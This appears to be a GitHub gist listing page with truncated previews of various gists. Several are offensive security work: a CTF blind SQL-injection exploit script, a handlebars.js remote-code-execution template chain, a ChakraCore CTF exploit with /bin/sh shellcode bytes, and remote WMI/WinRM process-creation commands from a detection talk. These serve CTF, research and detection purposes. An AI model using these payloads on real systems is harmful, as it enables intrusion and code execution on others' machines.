evandrix evandrix

@terjanq
terjanq / exploit.js
Last active Oct 7, 2019
This is a solution of Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
View exploit.js
const fetch = require('node-fetch');
var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/'
// Generates definitions for fonts
function generateFonts() {
View log-parsing.cpp
/*
* Given a log line that starts like this:
*
* 2014.01.27 19:35:51.639 (UTC-1) 3 1 ...
*
* the following takes about ~60 ms per call in a release build
* produced by a VC++ 2017 using its stock CRT (v141):
*/
sscanf(line,
View Batched REST example.md

A Proposal for Batched REST

An alternative to both REST & GraphQL, combining the benefits of each, based on https://tools.ietf.org/id/draft-snell-http-batch-00.html.

Batch multiple related requests into one HTTP request, which can be sent once & processed once on the server-side, but otherwise keep all the benefits of REST & HTTP. This is one single raw HTTP request:

POST /batch
Host: example.com
Content-Type: multipart/batch
@acutmore
acutmore / README.md
Last active Oct 16, 2019
Emulating a 4-Bit Virtual Machine in (TypeScript\JavaScript) (just Types no Script)
View README.md

A compile-time 4-Bit Virtual Machine implemented in TypeScript's type system. Capable of running a sample 'FizzBuzz' program.

Syntax emits zero JavaScript.

type RESULT = VM<
  [
    ["push", N_1],         // 1
    ["push", False],       // 2
    ["peek", _],           // 3
@itszn
itszn / 0day.handlebars
Created Sep 16, 2019
handlebars.js rce 0day
View 0day.handlebars
//First we want to create an array
{{#with "a" as |str|}}
{{#with split as |list|}}
//Store some function that returns a truthy value into the array
//We use arrays to hold functions because handlebars will call functions
{{this.pop}}
{{this.push this.toString}}
{{this.pop}}
@itszn
itszn / exploit.js
Last active Sep 18, 2019
Trendmicro CTF ChakraCore exploit
View exploit.js
let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];
let conva = new ArrayBuffer(8)
let convi = new Uint32Array(conva);
let convf = new Float64Array(conva);
function i2f(i) {
convi[0] = i%0x100000000;
convi[1] = i/0x100000000;
return convf[0];
@mattifestation
mattifestation / HowToDetectTechniqueX_Demos.ps1
Created Sep 6, 2019
Demo code from my DerbyCon talk: "How do I detect technique X in Windows?" Applied Methodology to Definitively Answer this Question
View HowToDetectTechniqueX_Demos.ps1
#region Attack validations
wmic /node:169.254.37.139 /user:Administrator /password:badpassword process call create notepad.exe
Invoke-WmiMethod -ComputerName 169.254.37.139 -Credential Administrator -Class Win32_Process -Name Create -ArgumentList notepad.exe
$CimSession = New-CimSession -ComputerName 169.254.37.139 -Credential Administrator
Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = 'notepad.exe' }
$CimSession | Remove-CimSession
winrm --% invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -remote:169.254.37.139 -username:Administrator -password:badpassword
@Unlimiter
Unlimiter / uv.h
Last active Oct 4, 2019
Vector definitions for C.
View uv.h
/*
MIT License
Copyright (c) 2019 Unlimiter
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
@hasherezade
hasherezade / main.cpp
Created Aug 27, 2019
Flare-On Task 10 - solution
View main.cpp
#include <Windows.h>
#include <iostream>
#include <cstdlib>
#include <cstdio>
#include <ctime>
void decipher(DWORD* v, BYTE *k)
{
unsigned int num_rounds = 32;
unsigned int i;
View sysmon-104-schema.xml
<manifest schemaversion="4.22" binaryversion="9.20">
<configuration>
<options>
<!-- Command-line only options -->
<option switch="i" name="Install" argument="optional" noconfig="true" exclusive="true" />
<option switch="c" name="Configuration" argument="optional" noconfig="true" exclusive="true" />
<option switch="u" name="UnInstall" argument="optional" noconfig="true" exclusive="true" />
<option switch="m" name="Manifest" argument="none" noconfig="true" exclusive="true" />
<option switch="t" name="DebugMode" argument="optional" noconfig="true" />
<option switch="s" name="PrintSchema" argument="optional" noconfig="true" exclusive="true" />